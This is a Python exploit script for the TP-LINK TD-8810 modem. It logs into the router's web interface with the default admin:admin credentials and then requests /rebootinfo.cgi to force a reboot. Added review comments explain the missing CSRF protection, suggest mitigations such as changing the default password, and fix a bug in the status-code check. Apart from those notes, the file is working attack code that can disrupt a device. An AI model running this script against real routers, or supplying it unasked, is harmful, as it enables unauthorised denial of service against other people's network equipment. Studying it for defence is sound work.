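#!/usr/bin/python
#
#[+]Exploit Title: TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit
#[+]Date: 01\09\2011
#[+]Author: C4SS!0 G0M3S
#[+]Version: TD-8810
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
# Review notes:
# - What the script shows: a plain GET for /rebootinfo.cgi, carrying only HTTP
#   Basic credentials, is sent as the reboot trigger. No token, POST body or
#   confirmation step is involved, which is presumably what "CSRF" in the
#   title refers to; the script itself sends the request directly rather than
#   through a browser.
# - Both requests use the factory-default admin:admin login. On a device whose
#   password has been changed, the first request should come back non-200 and
#   the script stops before the reboot request.
# - Detection/mitigation: change the default password, keep the management
#   interface off untrusted networks, and treat unexpected requests for
#   /rebootinfo.cgi or unexplained modem restarts as a signal worth checking.
# - Fixed here: the original status test compared an int with the string "200"
#   and then with 0, so it was always true and the reboot request was sent even
#   when the login had failed.
from socket import AF_INET, SOCK_STREAM, socket
from time import sleep
from base64 import b64encode
import os
import sys

# Fixed LAN address of the modem's web interface, as in the original script.
MODEM_HOST = "192.168.1.1"
MODEM_PORT = 80

# Using the default password
DEFAULT_CREDENTIALS = b"admin:admin"

BANNER = '''
        TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit
        Created by C4SS!0 G0M3S
        E-mail louredo_@hotmail.com
        Blog net-fuzzer.blogspot.com

'''


def build_request(path):
    """Return the raw HTTP/1.1 GET request for *path* as ASCII bytes.

    The two requests the script sends differ only in the path, so the header
    block is built once here. The original sent "User-Agent: User-Agent: ...";
    the duplicated field name is dropped.
    """
    basic_token = b64encode(DEFAULT_CREDENTIALS).decode("ascii")
    header_lines = [
        "GET " + path + " HTTP/1.1",
        "Host: " + MODEM_HOST,
        "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; "
        "rv:1.9.2.21) Gecko/20110830 Firefox/3.6.21",
        "Accept-Language: pt-br,pt;q=0.8,en-us;q=0.5,en;q=0.3",
        "Accept-Encoding: gzip,deflate",
        "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
        "Connection: keep-alive",
        "Authorization: Basic " + basic_token,
    ]
    return ("\r\n".join(header_lines) + "\r\n\r\n").encode("ascii")


def parse_status_code(response):
    """Return the numeric HTTP status from *response*, or None if unreadable.

    *response* is the raw bytes read from the socket. An empty reply or a
    status line without a numeric second field yields None instead of raising,
    so the caller can treat it as a failed login.
    """
    if not response:
        return None
    status_line = response.split(b"\r\n", 1)[0]
    fields = status_line.split(b" ")
    if len(fields) < 2:
        return None
    try:
        return int(fields[1].decode("ascii"))
    except (UnicodeDecodeError, ValueError):
        return None


def main():
    """Check the default login, then request /rebootinfo.cgi if it succeeded."""
    if os.name == 'nt':
        os.system("color 4f")
        os.system("cls")
        os.system("title TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit")
    else:
        os.system("clear")
    print(BANNER)

    print("\t\t[+]Connecting in the Modem TP-LINK TD-8810...")
    sleep(1)
    probe = socket(AF_INET, SOCK_STREAM, 0)
    try:
        probe.connect((MODEM_HOST, MODEM_PORT))
        print("\t\t[+]Sending HTTP Request...")
        sleep(1)
        # sendall: a bare send() may transmit only part of the request.
        probe.sendall(build_request("/"))
        data = probe.recv(100000)
    finally:
        # Close even when connect/send/recv raises.
        probe.close()

    # A 200 for "/" is taken as proof that the credentials were accepted.
    # NOTE(review): a device that answers 200 without checking the
    # Authorization header would also pass this test - confirm on hardware.
    if parse_status_code(data) == 200:
        print("\t\t[+]User Logged successfully.")
        sleep(1)
        print("\t\t[+]Sending the request to shutdown the modem...")
        sleep(1)
        trigger = socket(AF_INET, SOCK_STREAM, 0)
        try:
            trigger.connect((MODEM_HOST, MODEM_PORT))
            trigger.sendall(build_request("/rebootinfo.cgi"))
            print("\t\t[+]Exploit Sent wait your Modem Reboot... :)")
            # As in the original, wait before closing; no reply is read.
            sleep(1)
        finally:
            trigger.close()
    else:
        print("\t\t[+]I can't log in your modem. Maybe Password Or Username is Wrong.")
        sleep(1)


if __name__ == "__main__":
    main()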